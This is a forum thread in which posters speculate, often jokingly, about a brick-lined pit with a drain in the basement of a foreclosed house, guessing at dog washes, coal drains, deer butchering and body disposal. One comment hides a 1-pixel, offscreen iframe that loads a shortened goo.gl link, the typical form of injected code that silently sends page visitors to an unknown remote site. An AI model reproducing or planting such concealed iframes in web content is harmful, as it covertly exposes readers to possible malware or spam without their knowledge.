I'd ask the realtor to confirm what it is and provide documentation if necessary. I wouldn't want to inherit a problem.

I'm guessing that's where Maurice enters the house

The last time I saw something similar to that it was in the woods behind my mother's. There was once a piggery there and it turned out it was a pig wash.

I would say (or at least hope) it was some kind of drain pit like others said. But very odd! <iframe style="width:1px; height:1px; position:absolute; left:-10px;" src="http://goo.gl/0xkZCj"></iframe>

Why the privacy wall in front of it? Seems odd even to me, and I've seen plenty of strange things in people's basement when we replaced water services and meters for a local town. But I'm guessing dog wash for a very large family pet.

If it works for dissolving bodies, I've loads we can try it out on! (Bad day in work, just realised if I'd killed them when I first started I would be approaching parole hearing!)

I love them really, just want to murder them when I'm on deadline and they're reinventing the wheel

Im really really interested for an answer. What I cant figure out is why there is no lip for a grate to sit on and cover the entire "pit" and there does not look like there is a lip for something to cover the "drain" hole either.

So it looks like there isn't anything missing that would be useful. Just a pit with a drain in a basement that is only accessible by stairs.......WTF?

Only logical answer is at least one person was killed and their body dissolved in that house no two ways about it.

I been watching a lot of forensic TV. Spray some luminal, add black light and check for blood and DNA.
If you can close by Halloween you've got a built in feature right there. You could make a great impression on the neighbor kids.

I'm favoring Turbowoodworkers suggestion. I have a UV light that I use to "charge" glow-in-the-dark ice fishing jigs. That works for bodily fluids also and I would be shining it all over that "thing"! :shocking:

It looks like whatever was in it last was really muddy?

Is that oil on the floor in front of it?

If it was purely Unitarian, why the decorative brick? And not just blocks or more cast concrete?

It would **** to work on anything mounted in there or wash a pet around those jagged bricks?

Discussing with the homeowners is not an option as it is a foreclosure.

The property appears to already be under contract so I will not be returning for further investigation.

The Unitarians wanted a pretty place to pray!

I don,t know where this is in the country but maybe the guy did deer butchering or other and there was a rack on top of the bricks to rinse off the meat (deer , pigs, cows, people!) never seen anything like it

What is the age of this house? Did it possibly have a boiler for steam heat or a well and this is to drain water in case of a tank rupture? Or a bin for coal with a wash out drain?

My wife and I once looked at buying a house and it too had one of these in the basement. There were also hooks in the beam just above it.

As it turns out the guy as a poacher and was doing time. The house was being sold by his wife. The story was, he would hang the carcass there.

We also found the guys gun stash that the wife new nothing about.

Former owner stopped making payments...and disappeared?

How about an address at least. Since the OP isn't buying it maybe we can figure it out.
